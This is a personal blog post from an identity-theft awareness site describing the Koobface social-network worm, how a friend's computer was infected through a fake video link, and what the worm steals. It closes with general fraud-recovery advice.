KOOBFACE

I got a text message from one of my best friends this morning saying that I should warn my friends on Facebook about a virus, and also not to open any emails from her that would prompt me to watch a video.

That didn’t sound right, so I called her later that day.  So last week, before she left for a short Thanksgiving vacation, she got an email from one of her Facebook friends which said “Youur ccute ass is on our new video nowjj” or something like that.  So she, unsuspectingly followed a link, but nothing opened.  She didn’t think twice about it.  While she was on the vacation, she started getting emails from her friends basically yelling at her:  What are you sending us?  You are sending us a virus!  Stop!

When my wonderful friend opened that email from her Facebook friend and tried to download and watch the video, she instead installed, unknowingly of course, a computer worm called Koobface, which is an anagram of Facebook.

Koobface has been discovered over a year ago.  It is sometimes referred to as a “Facebook Virus”, because at first it targeted the Facebook users, but now it is targeting about eight different social networking sites, including MySpace, Twitter, Bebo, Friendster, etc.   The ultimate goal of this worm is to gather sensitive information such as credit card numbers, passwords, banking information, and any other social networking site login information. It also turns the infected computer into a zombie computer to form a botnet, meaning that it will send itself via email to all of your contacts saved in your address book.  It may also start automatically posting comments on your Facebook friends’ profiles with the links to the video.

Koobface has evolved since it has been discovered first and has many variations and components.    Koobface is a very sophisticated worm and distributes itself in various ways.  You may get an email from your friend, which will ask you to open and watch  a video, then quietly  download itself in the background, you won’t even notice.  Or you may be taken to a third-party website that may look like a genuine video sharing site such as YouTube, it will even have a picture of a Facebook friend you received an email from. Then you maybe prompted to upgrade your Adobe’s Flash Player, which is just a download link for this worm.  Another Koobface component can register a new Facebook account, confirm and email address in Gmail in order to active the newly registered Facebook account.  It will randomly join groups, add new friends and make posts on Facebook friend’s walls.  Not only that, those accounts are very well designed and even have photos, favorite songs, books and interests listed on the profile.

Another variant of Koobface can set up fake blogs and populate it with the links to the latest news through Google news feeds.  Those blogs contain the script that will redirect the user to a malicious site that tries to install the worm.

When your system gets infected with Koobface, it may be infected by other malicious software as well, sometimes you get a bundle of all kinds of bad stuff.  According to the report by TrendMicro, it seems that the Koobface is monetizing itself by implementing a pay-per-install model.  Other malware groups pay the Koobface group to install their own malicious software to the Koobface-infected systems.  In my friend’s case, in addition to Koobface, it was Virtumonde,aka Vundo or VundoTrojan and Mal/tinydl were installed.

Virtumonde is a Trojan Horse and is designed to create pop up windows and advertisement for rogue antispyware programs.  Mal/Tinydl is a Trojan downloader and it creates backdoors for more malware to be downloaded and installed on the infected system.

Since I am not an expert on how to remove Koobface, I can’t really tell you what to do step-by-step, but there are tools available for Koobface removal.

If you know more about this subject and want to add your opinion and knowledge, please leave a comment or email me and I will make sure to have updated information posted.

What I am going to suggest, though, if it happened to you, is to call your bank and notify them of the incident, close your account and open a new one, call one or all of the credit reporting agencies and place an initial fraud alert, cancel your credit cards and monitor your credit file for any unusual activities.

References:

Buy Kaspersky Software! Get industry leading virus detection rates and the fastest virus updates!

Wikipedia

TrendMicro

Finjan.com

ReadWriteWeb.com

About the Author

Lana is a real life Identity Theft Victim. Identity Theft Manifesto is a result of her own struggles to clear her credit, her name and reputation. She is on the mission to research, learn more and educate her readers about ID Theft Crime.